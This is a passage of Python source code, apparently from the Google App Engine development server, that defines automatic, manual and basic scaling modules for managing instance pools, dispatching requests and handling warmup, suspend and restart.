_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
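# Worked examples (illustrative, not in the original source):
#   _parse_pending_latency('250ms') -> 250 / 1000.0 == 0.25 seconds
#   _parse_pending_latency('0.1s')  -> 0.1 seconds
# i.e. the unit suffix is stripped and 'ms' values are converted to seconds.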
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containing (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances have already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
_THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(peak_concurrent_requests /
self.max_instance_concurrent_requests))
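# Worked example (illustrative, not in the original source): a recorded peak
# of 16 concurrent requests with max_instance_concurrent_requests == 8 yields
#   int(math.ceil(16 / 8)) == 2
# required instances; an empty request history means none are required.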
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Module that are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
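# Illustrative example (not in the original source): with five instances of
# which two are required by the current load, the two healthy instances with
# the most outstanding requests are returned as required_instances, and the
# remaining three (plus any instance that cannot accept requests) make up
# not_required_instances.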
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
_MAX_REQUEST_WAIT_TIME = 10
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The change watcher thread depends on the balanced module and the
# watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = appinfo.MODULE_SEPARATOR.join([
self._module_configuration.module_name,
self._module_configuration.version_id.split('.', 1)[0]])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _async_start_instance(self, wsgi_servr, inst):
_THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
_THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.ModuleAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
_THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.ModuleAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
for inst, wsgi_servr in zip(instances_to_stop, wsgi_servers):
self._async_suspend_instance(inst, wsgi_servr.port)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start):
self._async_start_instance(wsgi_servr, inst)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
_MAX_REQUEST_WAIT_TIME = 10
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
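# Worked examples (illustrative, not in the original source):
#   _parse_idle_timeout('15m') -> 15 * 60 == 900 seconds
#   _parse_idle_timeout('30s') -> 30 seconds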
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
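# Illustrative example (not in the original source): a basic_scaling block
# with max_instances='10' and idle_timeout='5m' sets self._max_instances to
# 10 (or lower if a smaller max_instances limit was passed to the
# constructor) and self._instance_idle_timeout to 300 seconds.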
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The change watcher thread depends on the balanced module and the
# watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
